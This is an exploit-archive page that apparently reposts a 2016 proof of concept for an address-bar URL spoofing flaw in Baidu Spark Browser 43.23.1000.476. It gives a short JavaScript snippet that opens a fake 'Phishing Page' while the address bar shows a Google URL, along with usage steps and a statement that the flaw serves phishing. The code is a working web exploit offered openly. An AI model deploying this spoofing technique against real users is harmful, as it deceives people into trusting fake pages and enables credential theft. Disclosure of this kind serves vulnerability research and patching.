Home / os / win10

Baidu Spark Browser 43.23.1000.476 - Address Bar URL Spoofing

Posted on 30 November -0001

<HTML><HEAD><TITLE>Baidu Spark Browser 43.23.1000.476 - Address Bar URL Spoofing</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY><!-- Exploit Title: Baidu Spark Browser URL spoof vulnerability Date:2016-05-02 Exploit Author: liu zhu Vendor Homepage:http://en.browser.baidu.com/ <http://en.browser.baidu.com/>Software Link:http://en.browser.baidu.com/query/fullpackage.exe?lang=en Version:43.23.1000.476 Tested on:Win7/WinXP details: The baidu spark browser is vulnerable to Address Bar Spoofing in the latest version of the browser(43.23.1000.476). Using the specail javascript code it was able to spoof the URL in the address bar which could trick the user that he is visiting a different site than he thinks. it<http://thinks.it/> can be used to phinshing attack. PoC: ------------------------------------------------------------------------------------------------ --> <SCRIPT LANGUAGE="JavaScript"> function winopen() {OW=window.open("", "newwin"); OW.document.write("<TITLE>Google</TITLE>"); OW.document.write("<h1>The Phishing Page !!</h1>"); OW.document.close(); } </SCRIPT> <a href="https://www.google.com.hk/" target="newwin" onclick="setTimeout('winopen()', 1);">Google Home Page</a> <!-- ------------------------------------------------------------------------ Save it as a HTML file, and then execute it in Baidu Spark Browser. Affact: The vulnerability can be used to Phishing attack, Because the URL can be the same as the URL that the visitor wants to visit,but the content is fake. Contact: <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="731f1a06091b06434a331b061204161a5d101c1e">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script> --> </BODY></HTML>

 

TOP